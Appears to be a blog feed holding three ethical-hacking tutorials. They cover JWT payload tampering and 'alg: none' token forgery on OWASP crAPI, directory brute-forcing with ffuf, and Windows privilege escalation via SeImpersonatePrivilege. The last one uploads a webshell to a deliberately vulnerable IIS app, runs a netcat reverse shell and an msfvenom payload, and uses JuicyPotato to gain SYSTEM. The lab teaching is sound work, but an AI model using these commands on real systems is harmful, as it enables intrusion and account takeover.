In this command, we&apos;re launching a probing expedition against various JWT vulnerabilities, seeking out any chinks in the armor that we might exploit to escalate privileges or access privileged information.

![](/content/images/2023/12/image-120.png)

As we analyze the scan results, imagine each green highlight as a marker of treasure – these are the vulnerabilities detected by our trusty tool. It&apos;s quite astonishing to see how many there are! Now, the real fun begins as we leverage these vulnerabilities. Let&apos;s dive in and see how we can turn these findings to our advantage, potentially uncovering paths to privileged access or sensitive information.

## **Unleashing Burp Suite for JWT Testing**

Let&apos;s up the ante in our JWT security exploration by bringing another player into the game – Burp Suite. But first, to make our tests even more effective, let&apos;s create another user in the application. It&apos;s like having an extra character in a video game, each with different abilities and access levels.

![](/content/images/2023/12/image-121.png)

Registration of another user

In the request we are working with – the main one issued when we enter the dashboard – we can see that, if we do not alter anything, it returns information about the user we are logged in with.

![](/content/images/2023/12/image-122.png)

Request without changing data

This is where Burp Suite steps in, acting like a digital scalpel. In the payload section of our token, we get the chance to tweak the data. What happens if we change the email to one that doesn&apos;t exist? It&apos;s like trying different keys in a lock until we find a mismatch. And indeed, the application responds by indicating the user doesn&apos;t exist. This is a telltale sign that the token signature might not be crafted or validated correctly.

![](/content/images/2023/12/image-123.png)

Alteration of payload data (select only the payload section so Burp recognizes it)

![](/content/images/2023/12/image-125.png)

Email does not exist

Now, let&apos;s turn the dial up. We aim to see if we can access information from another user just by knowing their email. With two users on the platform, we have the perfect setup for this test.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    Remember, in an API hacking audit, having at least two users – one with high privileges and one with lower ones – is crucial. It&apos;s like having two different lenses to view and understand the application&apos;s security landscape.
  &lt;/div&gt;
&lt;/div&gt;

So, let&apos;s make a switch in the email within the payload. And voilà! We find that we can indeed access information from another user – a door that, in theory, should have remained closed to us. This discovery not only highlights a critical security flaw but also underscores the power of tools like Burp Suite in unearthing these vulnerabilities.

![](/content/images/2023/12/image-126.png)

Listing another user&apos;s information

## **The Final Challenge: Attempting to Change Another User&apos;s Password**

Equipped with our newfound insights, let&apos;s push the boundaries a bit further. We suspect that other endpoints might also have vulnerabilities. What if we try something riskier, like changing another user&apos;s password? It&apos;s like testing the waters to see how deep the security flaws go.

![](/content/images/2023/12/image-132.png)

We start by capturing the request where we change the password for the user we&apos;re logged in with. It works like a charm; our password changes without a hitch. But now, let&apos;s spice things up. We tweak the payload, changing the email to that of another user. The goal? To see if we can reset their password. In this high-stakes game, we&apos;re using the Burp JSON Web Token plugin for the alteration, adding a new twist to our testing strategy.

![](/content/images/2023/12/image-133.png)

Password change request

![](/content/images/2023/12/image-134.png)

Invalid token detection

However, this endpoint seems to have a tighter security net. Despite our best efforts, it refuses to let us change another user&apos;s password. It’s a reminder that not all doors can be unlocked, even with the right set of tools.

We don&apos;t stop there. Running jwt\_tool against this endpoint reveals something interesting – no green tests this time, indicating that the endpoint is not vulnerable. It&apos;s like finding a well-secured treasure chest that refuses to budge.

![](/content/images/2023/12/image-131.png)

No vulnerability found

This experience underscores a crucial lesson: always test multiple endpoints. What fails on one might succeed on another. In the world of security testing, it&apos;s essential to cover all bases, leaving no stone unturned in our quest to ensure the application’s fortitude.

# **Fascinating Insight: The Storage and Impact of JWTs in Browsers**

Here&apos;s an intriguing piece of information that might seem straightforward but is often overlooked by those new to the field or with limited development experience. JWT tokens are commonly stored in a browser&apos;s local storage. This storage method is what makes them persistent and enables their inclusion in all API requests.

But there&apos;s more to it. What&apos;s particularly interesting to note is that developers sometimes leave part of the payload outside the JWT, perhaps in another cookie&apos;s value. And here&apos;s where it gets fascinating – altering this payload (often the role or permissions specified in the JWT) can change how the front-end appears. This means that tweaking these details could potentially reveal more of the application or expand the scope of endpoints accessible to us.

It&apos;s a subtle yet powerful aspect of JWTs that highlights the importance of thorough security considerations in both backend and frontend development. Understanding this can give us a better grasp of how applications function and, importantly, how they can be made more secure.

![](/content/images/2023/12/image-136.png)

JWT in local storage
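
To see for yourself that the payload is nothing more than readable JSON, you can round-trip a token segment with plain `base64`. Here&apos;s a self-contained sketch – the claims below are invented for illustration, not taken from crAPI:

```bash
# Build a throwaway JWT-style payload, then decode it back - showing that
# anyone holding the token can read the claims without the signing key.
CLAIMS='{"sub":"user@example.com","role":"user"}'
PAYLOAD=$(printf '%s' "$CLAIMS" | base64 | tr '+/' '-_' | tr -d '=\n')
JWT="eyJhbGciOiJIUzI1NiJ9.${PAYLOAD}.fakesignature"
# Decode: take the middle segment, undo the base64url alphabet, re-pad
SEG=$(printf '%s' "$JWT" | cut -d '.' -f 2 | tr '_-' '/+')
while [ $(( ${#SEG} % 4 )) -ne 0 ]; do SEG="${SEG}="; done
DECODED=$(printf '%s' "$SEG" | base64 -d)
echo "$DECODED"
```

This is exactly why sensitive data should never travel inside a JWT payload: encoding is not encryption.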

# **Concluding Thoughts: A Journey Through the World of JWTs and Beyond**

As we draw the curtain on this insightful exploration into JWTs and their role in API hacking, it&apos;s important to reflect on the journey we&apos;ve taken. We delved into the intricate workings of JWTs, uncovering a particular vulnerability that revealed the nuanced challenges in securing APIs. However, this is just the tip of the iceberg. JWTs harbor a myriad of vulnerabilities, each requiring careful consideration and strategic defense mechanisms.

For those eager to dive deeper and uncover more about these vulnerabilities, I highly recommend visiting the Burp Suite website. It&apos;s a treasure trove of information, offering further insights and resources on the subject.

But perhaps the most crucial takeaway is the importance of asking &quot;what if&quot; questions. In our journey, we experimented by changing the email within a JWT, but what if we had altered the user&apos;s role to &apos;admin&apos;? Such questions are the bedrock of effective security testing and ethical hacking. They push us to think beyond the obvious, to explore every possible angle, and to anticipate the moves of potential attackers.
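
As a concrete flavour of that &quot;what if&quot;, here&apos;s a hedged sketch of forging a role change with the infamous `alg: none` trick – no signing key needed. Whether a given backend accepts such a token is precisely what you&apos;d be testing (crAPI&apos;s behaviour isn&apos;t assumed here, and the claims are invented):

```bash
# base64url-encode without padding
b64url() { printf '%s' "$1" | base64 | tr '+/' '-_' | tr -d '=\n'; }
# Declare "alg": "none" and promote ourselves - hypothetical claims
HEADER=$(b64url '{"alg":"none","typ":"JWT"}')
PAYLOAD=$(b64url '{"sub":"user@example.com","role":"admin"}')
# An alg:none token carries an empty signature segment
FORGED="${HEADER}.${PAYLOAD}."
echo "$FORGED"
```

A patched JWT library rejects this outright; a misconfigured one hands you the keys to the kingdom. jwt\_tool automates this check along with many other variants.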

Remember, the world of cybersecurity is constantly evolving, and staying ahead means never ceasing to question, explore, and learn. This article is just a starting point – your journey into mastering API hacking and understanding the complexities of JWTs is an ongoing adventure.</content:encoded><author>Ruben Santos</author></item><item><title>Unveiling API Hacking: A Methodological Journey Through Recognition and Exploration</title><link>https://www.kayssel.com/post/api-hacking-2-2</link><guid isPermaLink="true">https://www.kayssel.com/post/api-hacking-2-2</guid><description>Embark on the &quot;Hacking APIs&quot; journey—setting up a dynamic lab, applying OWASP methodologies, and conducting potent brute force tests on crAPI. Stay tuned for the next chapter, delving into precise login portal testing to fortify application security</description><pubDate>Sun, 07 Jan 2024 18:27:29 GMT</pubDate><content:encoded># Introduction

Welcome to a captivating journey into the realm of API hacking, where every line of code tells a story, and every vulnerability opens a door to vast unexplored territories. In this article, we&apos;ll plunge into the intriguing world of crAPI, an application that challenges our auditing skills in a unique way. But before we dive deep into the intricacies of this fascinating universe, let&apos;s ensure we have the right tools and our playground is set. Let&apos;s configure our lab and get ready for the exhilarating art of hacking APIs!

# Crafting the Ultimate Playground: Setting Up Your API Hacking Lab

Let&apos;s delve into the intriguing realm of API hacking by setting up the ultimate playground: the crAPI application. The installation process is a breeze; just ensure you have Docker and Docker Compose on your machine and follow the official crAPI documentation at OWASP/crAPI.

[crAPI/docs/setup.md at develop · OWASP/crAPI](https://github.com/OWASP/crAPI/blob/develop/docs/setup.md)

If you&apos;re sticking with the local setup, no worries; no adjustments are needed in the docker-compose.yml file. However, if you opt for a virtual machine setup (perhaps using Proxmox), a few tweaks are necessary. Navigate to the &quot;ports&quot; section and replace &quot;127.0.0.1&quot; with &quot;0.0.0.0&quot; to allow requests from all network interfaces. Check out the screenshots below for a sneak peek.

![](/content/images/2023/12/image-107.png)

Configuration of docker-compose.yml

![](/content/images/2024/01/image-23.png)

Change mailhog

With everything set up and the documentation at your fingertips, it&apos;s showtime. Deploy the environment with a magical command:

```bash
docker-compose -f docker-compose.yml --compatibility up -d

```

-   **`-f`**: Picture this as the script for our Docker orchestra. We specify the composition file (`docker-compose.yml`), outlining how our containers should interact and play together.
-   **`--compatibility`**: Think of this as compatibility mode. It tells Compose to translate version 3 `deploy` keys (resource limits and the like) into their non-Swarm equivalents, so the file behaves the same on a plain Docker host.
-   **`up`**: This is the maestro&apos;s command, telling Docker to bring our composition to life! It orchestrates the deployment of our containers, creating a harmonious ensemble of interconnected services.
-   **`-d`**: Ah, the director&apos;s cut! This flag stands for detached mode, meaning our containers will perform their virtuoso acts in the background, allowing us to enjoy the show without being bombarded by logs.

In essence, with this command, we&apos;re telling Docker to follow our musical score (`docker-compose.yml`), ensuring compatibility among the performers, and then orchestrating a grand performance in the background. Bravo!

And just like that, you’re all set to explore the realm of API hacking!

# How to Hack like a Pro: Navigating the Auditing Maze with OWASP and More

Let&apos;s immerse ourselves in the world of auditing, but before we dive too deep, remember this crucial point—it&apos;s not a random game. We need some details upfront, and that&apos;s where the client comes in. They provide the scope (think target URL) and guide us on where to focus our hacking efforts (data filtering, injections, and the whole shebang).

Take our case, for instance. We&apos;re dealing with the crAPI application (yes, chuckle at the name if you must). We have the URL, and our mission is to conquer the world of API hacking.

To navigate this labyrinth, we need a sherpa, and that&apos;s where OWASP comes in. Picture them as the cool kids in cybersecurity, providing insights on testing and fortifying app security. Since our app dances with an API, we&apos;re eyeing the top 10 vulnerabilities OWASP has identified in these bad boys.

[OWASP API Security Project | OWASP Foundation](https://owasp.org/www-project-api-security/)

Here&apos;s the golden nugget of wisdom: before you unleash your testing ninja skills on any app, bow down to OWASP. Memorize it, tattoo it on your arm—whatever suits your style.

But wait, there&apos;s more! OWASP is like a treasure trove of hacking methodologies, tailored for every occasion you might encounter in your pentester life. Got a mobile app on your hands? They got you covered.

[OWASP MASTG - OWASP Mobile Application Security](https://mas.owasp.org/MASTG/)

And if OWASP leaves you craving more, or you need a quick fix, there’s always Hacktricks, the Swiss Army knife of hacking wisdom. It&apos;s got a bit of everything to tickle your fancy.

[HackTricks - HackTricks](https://book.hacktricks.xyz/welcome/readme)

Now, these methodologies can feel like a buffet where you want to try everything, but hold your horses. Incorporate them into your toolkit bit by bit, like adding spices to your secret sauce. My goal here is to hand you a simple yet solid API hacking starter pack. We’re talking basics—what to peek at when an app&apos;s got APIs. Once you&apos;re comfy with the basics and sidestep the usual traps, you can level up your game.

Remember, when you&apos;re starting out, you don’t have to be the Einstein of hacking. It’s a slow dance, a gradual journey. So, if an audit feels like you&apos;re juggling too much, relax. This realm is vast, and you’re in it for the long haul. Learn, adapt, and don’t let the overwhelm sneak in. You got this! 🚀

# **Mastering Application Audits: A Survival Guide**

Navigating an application audit requires a well-defined methodology to avoid drowning in complexity. I kick off the process by meticulously cataloging the application&apos;s functionalities, ensuring a comprehensive understanding. This systematic approach is universally applicable, whether the application is tailored for Android, iOS, or web platforms.

To document and fortify this exploration, I create a dedicated &apos;memory&apos;—a repository of steps and tests for future reference. This strategic documentation proves invaluable, enabling me to recall specific details effortlessly, even months later. Utilizing tools like Obsidian, I capture detailed notes and screenshots, facilitating comprehensive recall.

Armed with a holistic, high-level overview, I adopt a structured testing approach—from addressing the most critical aspects to the less critical ones. This prioritization aligns with the type of application under examination, following the esteemed OWASP guidelines. The meticulous testing strategy ensures a robust evaluation, contributing to the overall effectiveness of the audit process.

![](/content/images/2023/12/image-137.png)

Obsidian structure of a section

End-of-day rituals involve cross-referencing progress against a meticulously curated checklist. This step ensures that every crucial facet has been thoroughly examined, leaving no room for oversight. While generic templates are available on platforms like GitHub, I advocate for crafting a personalized checklist tailored to the unique nuances of the assessment at hand. This bespoke approach guarantees a more nuanced evaluation and aligns closely with the specific needs of the project.

It&apos;s crucial to acknowledge that this process is a dynamic and continuous learning journey. The pursuit of excellence involves the ongoing refinement of strategies, emphasizing the importance of gradual improvement over time. Embrace the ethos of perpetual learning, and the iterative evolution of your methodology will undoubtedly yield more robust and effective results.

[GitHub - arainho/awesome-api-security: A collection of awesome API Security tools and resources. The focus goes to open-source tools and resources that benefit all the community.](https://github.com/arainho/awesome-api-security)

# **Exploration Unveiled: Navigating the Digital Maze**

Embarking on our journey into application auditing, we plunge into the intriguing realm of crAPI testing. Our first port of call: the login interface. Here, we unleash the power of tools like ffuf or feroxbuster, conducting brute force tests to map directories and validate access without the need for credentials.

![](/content/images/2023/12/image-135.png)

Portal login

The unraveled information is meticulously logged into our &quot;memory bank&quot; for future reviews, marking only the commencement of our thorough assessment.

```bash
ffuf -u &quot;http://192.168.20.120:8888/FUZZ&quot; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 2835

```

-   **`-u`**: This is where we specify the target URL, with &quot;[http://192.168.20.120:8888/FUZZ](http://192.168.20.120:8888/FUZZ)&quot; acting as a placeholder for the word that will be tested in each iteration.
-   **`-w`**: Think of this as the word arsenal! It&apos;s where we define the wordlist (in this case, `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`) that ffuf will use to launch its brute force attack.
-   **`-fs`**: Here we filter responses by size. `-fs 2835` tells ffuf to hide every response whose body is exactly 2835 bytes – the size of the server&apos;s generic &quot;not found&quot; page – so only the interesting hits remain.

These nifty options empower ffuf to flex its muscles, systematically trying out each word from the list and discarding the uniform &quot;not found&quot; responses by their size. It&apos;s like Sherlock Holmes combing through clues to uncover hidden paths or directories without the need for credentials. Quite the detective work, wouldn&apos;t you say?

![](/content/images/2023/12/image-138.png)

Ffuf results

## User registration and initial glimpse

Post-directory exploration, the next stride involves user registration to unlock the application&apos;s functionalities.

![](/content/images/2023/12/image-108.png)

User registration

The payoff: distinct sections to explore, each revealing a facet of the digital landscape. A dashboard showcasing potential vehicle acquisitions, a store for procuring vehicle components, a community hub for user interactions, and a profile section encapsulating user characteristics.

## **Segmented Analysis**

This segmentation allows us to deconstruct the seemingly vast application into manageable components, enabling a more focused testing approach. The identified sections for detailed scrutiny include:

1.  **Login/Authentications Page**
2.  **Dashboard Information**
3.  **Component Purchase Area**
4.  **User Registration Area**
5.  **Community Area**
6.  **User Profile**

## **Structuring the Test Memory**

For effective documentation, our test memory aligns with these sections. As we delve into each area, pertinent details are recorded, encompassing functionality descriptions, operational processes, and thought-provoking questions. This meticulous documentation serves as a reference for the ongoing audit, ensuring a systematic and thorough examination of each facet.

By methodically covering these delineated areas, what initially appeared daunting is gradually deconstructed into comprehensible components, streamlining our testing process. The test memory becomes a dynamic repository, evolving with each audit iteration and fostering continuous improvement in our methodology.

![](/content/images/2023/12/image-139.png)

Structured memory

**Navigating Each Section:**

As we navigate through each of these sections, our approach involves capturing a detailed snapshot of the application&apos;s landscape. This entails not just assessing functionalities but also delving into the intricacies of operations, prompting thoughtful questions, and encapsulating the essence of our exploration.

**Functionality Descriptions:**

Each section is a canvas on which the application paints a unique picture. We meticulously document the functionalities, offering a vivid description that encapsulates the purpose and potential impact.

**Operational Insights:**

Our scrutiny extends beyond the surface, unraveling the nuances of how different operations unfold within each area. This includes a step-by-step analysis, shedding light on the mechanics behind the user experience.

**Thought-Provoking Questions:**

In the pursuit of a comprehensive evaluation, we pose questions that serve as signposts for deeper inquiry. These questions not only assess current functionality but also stimulate reflection on potential improvements or vulnerabilities.

**Continuous Iteration:**

The documentation process is not a static endeavor. As we cover each area, our understanding evolves, prompting updates and refinements in our approach. It&apos;s a dynamic journey of continuous improvement, mirroring the iterative nature of technology itself.

By weaving together descriptions, operational insights, and thought-provoking queries, our documentation becomes a rich narrative, providing not just a record of the application&apos;s current state but a roadmap for its ongoing enhancement and fortification.

# **Conclusion**

Up to this point, we&apos;ve laid the foundation for our expedition into application auditing and API hacking. We&apos;ve set up our lab, explored OWASP methodologies, and taken our initial steps in analyzing crAPI. But what happens when we face the most critical entry point: the login portal? How do we apply our skills specifically at this crucial juncture? In the next chapter, we&apos;ll dive even deeper into the heart of the application, focusing on targeted tests for the login portal. Get ready to uncover how to unravel the hidden secrets behind each input field and strengthen crAPI&apos;s security from its most vulnerable access point. Stay tuned as we unravel the next level of our API hacking adventure!</content:encoded><author>Ruben Santos</author></item><item><title>Navigating SeImpersonatePrivilege and Unleashing Remote Code Execution</title><link>https://www.kayssel.com/post/seimpersonateprivilege</link><guid isPermaLink="true">https://www.kayssel.com/post/seimpersonateprivilege</guid><description>Explore the intrigue of Windows privilege escalation in Chapter 13 of #ActiveDirectory Chronicles. Join SeImpersonatePrivilege and JuicyPotato on a journey of ethical hacking, hands-on labs, and real-world exploits in the dynamic realm of cybersecurity.</description><pubDate>Sat, 30 Dec 2023 12:30:25 GMT</pubDate><content:encoded># **Navigating the Unknown: Introduction**

Hello, fearless explorers! Welcome to the directorial realm of Active Directory Chronicles! In today&apos;s episode, we embark on a thrilling journey into the saga of Windows privilege escalation. Our main character, SeImpersonatePrivilege, is about to steal the spotlight, unraveling the mysteries of user privilege elevation within the intricate storyline of Active Directory.

As we delve into this captivating narrative, it&apos;s worth noting that our exploration is part of a larger series titled &quot;Introduction to Active Directory,&quot; and this happens to be the enthralling Chapter 13. Throughout this series, we&apos;ve navigated through the labyrinth of Active Directory&apos;s intricacies, shedding light on various aspects of its functionality and security implications.

In this installment, our hero, JuicyPotato, takes center stage, showcasing the art of ethical testing and the indispensable role of transparent client communication in our cybersecurity drama. But wait, there&apos;s more! Our adventure wouldn&apos;t be complete without a hands-on lab setup – a crucial backdrop for the real-world action that unfolds. Armed with essential tools like wes.py, our characters are ready to stay ahead in the privilege escalation game within the vast realm of Active Directory.

So, grab your popcorn and join us for another thrilling episode of Active Directory Chronicles, where each chapter brings new challenges, exploits, and discoveries in the dynamic world of cybersecurity!

# **Unraveling the Mystery: What Lurks in This Vulnerability?**

SeImpersonatePrivilege is like a backstage pass in the Windows world, granting users the power to act on behalf of others. Imagine having the ability to wear different hats in the digital realm! But beware, this power comes with a catch – the potential to ascend to the mighty SYSTEM user.

In our story, we often encounter this privilege after pulling off some Remote Code Execution (RCE) magic on applications hosted on Internet Information Services (IIS). Don&apos;t worry if this sounds like wizardry; we&apos;ll break it down shortly. The service account running the application inherits this privilege by default, setting the stage for our cybersecurity drama.

# **Setting the Stage: Our Cyber Tale**

Now, let&apos;s walk through the process of escalating privileges using this technique with a simple scenario. Picture this: an attacker named Beru stumbles upon a server with an open port 80. Intrigued, Beru browses to the site, discovers the ability to upload files to the web application, and decides to take advantage.

In a cunning move, Beru uploads a webshell, gaining access to the server and uncovering a user with the coveted &quot;SeImpersonatePrivilege.&quot; This revelation sparks joy in Beru, as it means assuming the role of the system user, the highest level of privilege.

![](/content/images/2023/12/image-103.png)

Attack diagram

With the stage set, let&apos;s move on to the critical step – setting up our small cybersecurity laboratory.

# **Forging the Cyber Playground: Lab Setup Unveiled**

Our first move in executing the attack is to establish a vulnerable lab environment. I opted for a Windows Server 2016 on my trusty Proxmox setup – a cloud-ready operating system delivering security layers and Azure-inspired innovation.

[Windows Server 2016 | Microsoft Evaluation Center](https://www.microsoft.com/en-us/evalcenter/download-windows-server-2016)

If you&apos;re curious about the setup process, check out my series where I guide you through configuring Windows servers in Proxmox:

[Offensive Lab](https://www.kayssel.com/series/offensive-lab/)

Once the installation is complete, we&apos;ll transform the server into an IIS (Internet Information Service). Follow the configuration steps, and voilà! Your server should now proudly display the familiar Windows IIS page, confirming a successful setup.

![](/content/images/2023/12/image-79.png)

Select that we want to add a new functionality

![](/content/images/2023/12/image-80.png)

We select that we want it to be IIS

![](/content/images/2023/12/image-81.png)

Check the &quot;HTTP Activation&quot; checkbox

![](/content/images/2023/12/image-82.png)

Service installation process

![](/content/images/2023/12/image-83.png)

Default IIS page

To simulate a file upload scenario, we&apos;ll create an application. Check out the code for two files that need to be placed in the specified path: `C:\inetpub\wwwroot`.

```cs
using System;
using System.IO;
using System.Web;

public partial class FileUpload : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }

    protected void btnUpload_Click(object sender, EventArgs e)
    {
        if (fileUpload.HasFile)
        {
            try
            {
                string fileName = Path.GetFileName(fileUpload.FileName);
                string uploadPath = Server.MapPath(&quot;~/uploads/&quot;); 

                if (!Directory.Exists(uploadPath))
                {
                    Directory.CreateDirectory(uploadPath);
                }

                string filePath = Path.Combine(uploadPath, fileName);
                fileUpload.SaveAs(filePath);

                lblStatus.Text = &quot;File uploaded successfully.&quot;;
            }
            catch (Exception ex)
            {
                lblStatus.Text = &quot;Error uploading the file. Details: &quot; + ex.Message;
            }
        }
        else
        {
            lblStatus.Text = &quot;Please select a file&quot;;
        }
    }
}

```

```html
&lt;%@ Page Language=&quot;C#&quot; AutoEventWireup=&quot;true&quot; CodeFile=&quot;FileUpload.aspx.cs&quot; Inherits=&quot;FileUpload&quot; %&gt;

&lt;!DOCTYPE html&gt;
&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
&lt;head runat=&quot;server&quot;&gt;
    &lt;title&gt;File Upload Example&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;form id=&quot;form1&quot; runat=&quot;server&quot;&gt;
        &lt;div&gt;
            &lt;h2&gt;File Upload Example&lt;/h2&gt;
            &lt;asp:FileUpload ID=&quot;fileUpload&quot; runat=&quot;server&quot; /&gt;
            &lt;br /&gt;
            &lt;asp:Button ID=&quot;btnUpload&quot; runat=&quot;server&quot; Text=&quot;Upload&quot; OnClick=&quot;btnUpload_Click&quot; /&gt;
            &lt;br /&gt;
            &lt;asp:Label ID=&quot;lblStatus&quot; runat=&quot;server&quot; Text=&quot;&quot;&gt;&lt;/asp:Label&gt;
        &lt;/div&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;


```

![](/content/images/2023/12/image-100.png)

Page setup

But hold on! When attempting to upload a file, you might hit a snag. That&apos;s because the application lacks the necessary permissions for file uploads. Fear not, we&apos;ll address this by adjusting the privileges of the folder where the files are stored.

![](/content/images/2023/12/image-84.png)

Lack of privileges

To address this, you can adjust the privileges of the folder where the uploaded files are stored. You can accomplish this through the Security section within the folder properties.

![](/content/images/2023/12/image-85.png)

Properties

Specifically, you&apos;ll need to grant all users full control over this folder. To achieve this, select the &quot;Full Control&quot; option.

![](/content/images/2023/12/image-86.png)

Grant privileges to users

After following these steps, you&apos;ve successfully set up the application to permit file uploads. Windows offers a utility for handling all things web service-related called &quot;inetmgr.&quot; The authorization we bestowed upon the folder could have also been established via &quot;inetmgr.&quot; In either case, this tool will streamline the exploitation process in our lab by enabling the listing of documents in the service. To do this, simply click on &quot;Directory Browsing&quot; and activate it.

![](/content/images/2023/12/image-88.png)

inetmgr

![](/content/images/2023/12/image-87.png)

Enable directory list

With this configuration, you can now list directories on the web server, simplifying the process of accessing a potential webshell.

![](/content/images/2023/12/image-101.png)

Directory listing

With these configurations in place, your scenario is ready, and the exploitation phase awaits.

# **Elevating the Game: The Art of Privilege Escalation**

With our lab setup complete, it&apos;s time for the exciting part. Beru identifies the IIS with the web application allowing file uploads.

![](/content/images/2023/12/image-91.png)

File upload location

![](/content/images/2023/12/image-102.png)

Directory with webshells

Seeing this, Beru seizes the opportunity, uploading an ASPX webshell to test the waters for remote commands. After a successful upload, Beru confirms Remote Code Execution (RCE) capability. The user executing the application now possesses the coveted &quot;SeImpersonatePrivilege.&quot;

![](/content/images/2023/12/image-92.png)

User privileges

Beru, now armed with this privilege, employs a slick technique to access the machine via RCE. The advantage? It leaves no trace on the client machine – a cleaner operation.

![](/content/images/2023/12/image-106.png)

Technique diagram

To execute this, Beru copies the nc.exe binary to a folder containing all its post-exploitation files.

![](/content/images/2023/12/image-105.png)

Folder with all files

Upon being copied to that directory, Beru proceeds to mount a Samba server on the designated path.

![](/content/images/2023/12/image-93.png)

Network shared folder

Now, Beru executes the following command, establishing a connection to his machine through nc.exe by accessing the network shared folder created on the SMB server. (Remember to run a listening instance of nc on the attacker&apos;s machine.)

```bash
nc -nvlp 4444 # Beru&apos;s machine

```

```bash
\\192.168.1.148\smbserver\nc.exe -e cmd.exe 192.168.1.148 4444 

```

![](/content/images/2023/12/image-98.png)

Access to nc.exe via webshell and network shared folder

![](/content/images/2023/12/image-95.png)

Incoming connection

This technique provides Beru with access to the machine, enabling him to proceed with further exploitation.

![](/content/images/2023/12/image-94.png)

Reverse shell

Here, I&apos;d like to make a brief side note. In this case, I&apos;m using JuicyPotato, an exploit that abuses SeImpersonatePrivilege. However, there are various exploits available, and the choice may depend on the specific server and its version.

[Jorge Lajara Website](https://jlajara.gitlab.io/Potatoes_Windows_Privesc)

With that clarification, Beru proceeds to copy the binary to the target machine to exploit the privilege. He continues to utilize the SMB server, eliminating the need to set up an HTTP server or any additional infrastructure.

```bash
copy \\192.168.1.148\smbserver\JuicyPotato.exe JuicyPotato.exe

```

Among all the exploits associated with SeImpersonatePrivilege, this one is the most intricate to execute, and that&apos;s why I wanted to introduce it. It encompasses a variety of options.

```bash

T:\&gt;JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: &lt;t&gt; CreateProcessWithTokenW, &lt;u&gt; CreateProcessAsUser, &lt;*&gt; try both
-p &lt;program&gt;: program to launch
-l &lt;port&gt;: COM server listen port


Optional args:
-m &lt;ip&gt;: COM server listen address (default 127.0.0.1)
-a &lt;argument&gt;: command line argument to pass to program (default NULL)
-k &lt;ip&gt;: RPC server ip address (default 127.0.0.1)
-n &lt;port&gt;: RPC server listen port (default 135)
-c &lt;{clsid}&gt;: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token&apos;s user

```

Among these options, we are particularly interested in the following:

-   `-t`: This option specifies the function used to spawn the new process. Typically, we set it to &quot;\*&quot; so JuicyPotato tries both `CreateProcessWithTokenW` and `CreateProcessAsUser`.
-   `-p`: This option specifies the program to be executed. In our case, we&apos;ll often use a payload generated by msfvenom to streamline exploitation. However, it&apos;s worth noting that other actions, such as creating a user in the administrators group, could also be performed, as demonstrated in earlier chapters of this series.
-   `-l`: We use this option to specify the COM server port. My choice in this case has been 4444.

Therefore, continuing with the scenario, Beru would prepare a payload with msfvenom to run alongside the exploit.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe &gt; shell.exe

```

Following the payload preparation, Beru transfers it to the machine via the SMB server set up earlier. He then listens on the designated &quot;LPORT&quot; and, finally, executes the exploit.

```cmd
JuicyPotato.exe -t * -p shell.exe -l 4444

```

![](/content/images/2023/12/image-97.png)

Execution of Juicypotato

With the successful execution of the exploit, Beru would have elevated his privileges to become the System user on the machine!

![](/content/images/2023/12/image-96.png)

We are system

Typically, with these three parameters configured correctly, the exploit should work. However, if you encounter issues, you may need to specify the CLSID.

[juicy-potato/CLSID/README.md at master · ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md)

Selecting the appropriate CLSID from the list, based on the operating system of the target machine, is crucial. In this scenario, you can utilize the `systeminfo` command to determine the operating system and its version on the target machine.

![](/content/images/2023/12/image-112.png)

Systeminfo usage

![](/content/images/2023/12/image-110.png)

Operating system selection

![](/content/images/2023/12/image-111.png)

CLSID selection

It&apos;s crucial to ensure that the selected CLSID corresponds to the System user. Once confirmed, simply copy and paste it into the command, resulting in something like this:

```bash
JuicyPotato.exe -t * -p shell.exe -l 4444 -c &quot;{C5D3C0E1-DC41-4F83-8BA8-CC0D46BCCDE3}&quot;

```

# **Exploring the Depths of Exploits**

This exploit you&apos;ve just seen is one of the most commonly used methods for privilege escalation. However, as you might anticipate, there are numerous other techniques, with many involving the exploitation of the Windows kernel.

In the past, the windows-exploit-suggester tool was commonly used for this purpose, especially with older operating systems. You can still use this tool, and here is the link:

[GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)

However, be aware that windows-exploit-suggester may not recognize many modern operating systems because it&apos;s quite old. Consequently, I recommend using wes.py instead. Here is the tool:

[GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng)

It&apos;s a straightforward tool to use. After obtaining information about the operating system using the systeminfo command in Windows, you can run the tool as follows:

```bash
python3 wes.py systeminfo.txt

```

As mentioned earlier, to obtain the systeminfo.txt, you just need to execute the command on the compromised machine, copy the generated output, and transfer it to your machine.

![](/content/images/2023/12/image-128.png)

Systeminfo

The tool&apos;s output can be overwhelming, presenting numerous potential exploit options. This phase can be challenging: you may need to attempt them one by one until you successfully escalate privileges, which underlines the importance of a systematic and thorough approach.

It&apos;s also crucial to exercise responsible disclosure. In a non-CTF (Capture The Flag) environment, you should always inform the client before attempting exploits, especially those that might lead to a denial of service or other risks. Open communication ensures ethical and responsible behavior during security assessments and penetration testing engagements.

![](/content/images/2023/12/image-129.png)

wes.py

In my case, I keep a set of exploits saved that I know usually work against a given operating system. Some of the most commonly used ones are in the following repository:

[GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits)

# **Unveiling the Cipher: Conclusions**

So, wrapping it up in our cyber-adventure: Windows privilege escalation – it&apos;s like leveling up in a digital game, and SeImpersonatePrivilege is our secret passage to the VIP suite.

